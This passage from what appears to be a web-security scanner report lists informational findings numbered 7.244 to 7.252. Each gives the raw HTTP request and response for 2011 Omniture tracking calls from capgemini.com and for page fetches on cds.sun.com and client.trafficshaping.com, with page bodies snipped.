GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s98762076739221?AQB=1&ndh=1&t=28/1/2011%2011%3A51%3A42%201%20360&pageName=Investor%20Relation&g=http%3A//www.capgemini.com/investor/welcome/&h1=Home%7CInvestor%20Relations%7CWelcome&v2=/investor/welcome/&h2=Home%7CInvestor%20Relations%7CWelcome&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/investor/welcome/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:51:39 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:51:39 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:51:39 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:51:39 GMT
Last-Modified: Tue, 01 Mar 2011 17:51:39 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE0AB-0903-1161DCE0"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www2
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.244. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s98839918370358  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s98839918370358

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s98839918370358?AQB=1&ndh=1&t=28/1/2011%2011%3A57%3A8%201%20360&pageName=Introduction%20to%20Capgemini&g=http%3A//www.capgemini.com/about/capgemini/&r=http%3A//www.capgemini.com/about/our_people/&ch=About%20Us&c1=About%20Us&h1=Home%7CAbout%20Us%7CIntroduction%20to%20Capgemini&v2=/about/capgemini/&h2=Home%7CAbout%20Us%7CIntroduction%20to%20Capgemini&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/about/capgemini/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:57:05 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:57:05 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:57:05 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:57:05 GMT
Last-Modified: Tue, 01 Mar 2011 17:57:05 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE1F1-0173-525E035B"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www57
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.245. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s99187269594985  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s99187269594985

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s99187269594985?AQB=1&ndh=1&t=28/1/2011%2011%3A51%3A46%201%20360&pageName=My%20Capgemini&g=http%3A//www.capgemini.com/my-capgemini/&h1=Home%7CMy%20Capgemini&v2=/my-capgemini/&h2=Home%7CMy%20Capgemini&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/my-capgemini/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:51:49 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:51:49 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:51:49 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:51:49 GMT
Last-Modified: Tue, 01 Mar 2011 17:51:49 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE0B5-17EB-25DDFB29"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www184
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.246. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s99299144083634  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s99299144083634

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s99299144083634?AQB=1&ndh=1&t=28/1/2011%2011%3A51%3A30%201%20360&pageName=Collaborative%20Business%20Experience&g=http%3A//www.capgemini.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pe=lnk_e&pev1=http%3A//www.capgemini.com/news-and-events/&pid=Collaborative%20Business%20Experience&pidt=1&oid=http%3A//www.capgemini.com/news-and-events/&ot=A&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:51:29 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:51:29 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:51:29 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:51:29 GMT
Last-Modified: Tue, 01 Mar 2011 17:51:29 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE0A1-32E3-2FC71A06"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www175
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.247. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s9971707289572  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s9971707289572

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s9971707289572?AQB=1&ndh=1&t=28/1/2011%2011%3A51%3A54%201%20360&pageName=Publications&g=http%3A//www.capgemini.com/insights-and-resources/by-publication/&r=http%3A//www.capgemini.com/news-and-events/&ch=Insights%20%26%20Resources&c1=Insights%20%26%20Resources&h1=Home%7CInsights%20%26%20Resources%7CPublications&v2=/insights-and-resources/by-publication/&h2=Home%7CInsights%20%26%20Resources%7CPublications&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/insights-and-resources/by-publication/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:51:52 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:51:52 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:51:52 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:51:52 GMT
Last-Modified: Tue, 01 Mar 2011 17:51:52 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE0B8-2546-15A5B753"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www111
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.248. https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cds.sun.com
Path:   /is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start

Request

GET /is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start HTTP/1.1
Host: cds.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:28:15 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 11872
Set-Cookie: sid=h6K_r-Aln6W_qa1MCy02UfCX8u4AzwKNQXz7cC1PBHW3rwL2Kes=; path=/
Set-Cookie: pgid=yYdgaHqkkjVSR0EUPIQsoQ3D0000ROl39Rr3; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: CDS_DETECT=detect; Domain=.sun.com; Path=/
Accept-Ranges: bytes
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...

7.249. https://client.trafficshaping.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://client.trafficshaping.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: client.trafficshaping.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; __switchTo5x=95; __utmz=50089699.1298824334.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MintUnique=1; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200; MintAcceptsCookies=1; __utma=50089699.1488621134.1298824334.1298824334.1298824334.1; __utmc=50089699; __utmb=50089699.3.10.1298824334; MintAcceptsCookies=1; __unam=d903aed-12e67f689b8-53801d6e-4

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:42:52 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: csId=deleted; expires=Sat, 27-Feb-2010 16:42:51 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 3330

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title></title>
<link rel="stylesheet" href="/_css/screen.css" type="text/css" med
...[SNIP]...

7.250. https://client.trafficshaping.com/feedback  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://client.trafficshaping.com
Path:   /feedback

Request

GET /feedback HTTP/1.1
Host: client.trafficshaping.com
Connection: keep-alive
Referer: https://client.trafficshaping.com/pricing
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; __switchTo5x=95; __utmz=50089699.1298824334.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MintUnique=1; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200; MintAcceptsCookies=1; __utma=50089699.1488621134.1298824334.1298824334.1298824334.1; __utmc=50089699; __utmb=50089699.3.10.1298824334; MintAcceptsCookies=1; __unam=d903aed-12e67f689b8-53801d6e-8

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:49:04 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: csId=deleted; expires=Sat, 27-Feb-2010 16:49:05 GMT
Set-Cookie: csId=deleted; expires=Sat, 27-Feb-2010 16:49:05 GMT
Set-Cookie: csId=deleted; expires=Sat, 27-Feb-2010 16:49:05 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 6067

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Contact TrafficShaping</title>
<meta name="description" content="Contact Traffi
...[SNIP]...

7.251. https://client.trafficshaping.com/pricing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://client.trafficshaping.com
Path:   /pricing

Request

GET /pricing HTTP/1.1
Host: client.trafficshaping.com
Connection: keep-alive
Referer: https://client.trafficshaping.com/signin
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; __switchTo5x=95; __utmz=50089699.1298824334.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MintUnique=1; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200; MintAcceptsCookies=1; __utma=50089699.1488621134.1298824334.1298824334.1298824334.1; __utmc=50089699; __utmb=50089699.3.10.1298824334; MintAcceptsCookies=1; __unam=d903aed-12e67f689b8-53801d6e-5

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:45:26 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: csId=deleted; expires=Sat, 27-Feb-2010 16:45:25 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 7421

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Plans and Pricing for TrafficShaping URL Shortener</title>
<meta name="descript
...[SNIP]...

7.252. https://client.trafficshaping.com/signin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://client.trafficshaping.com
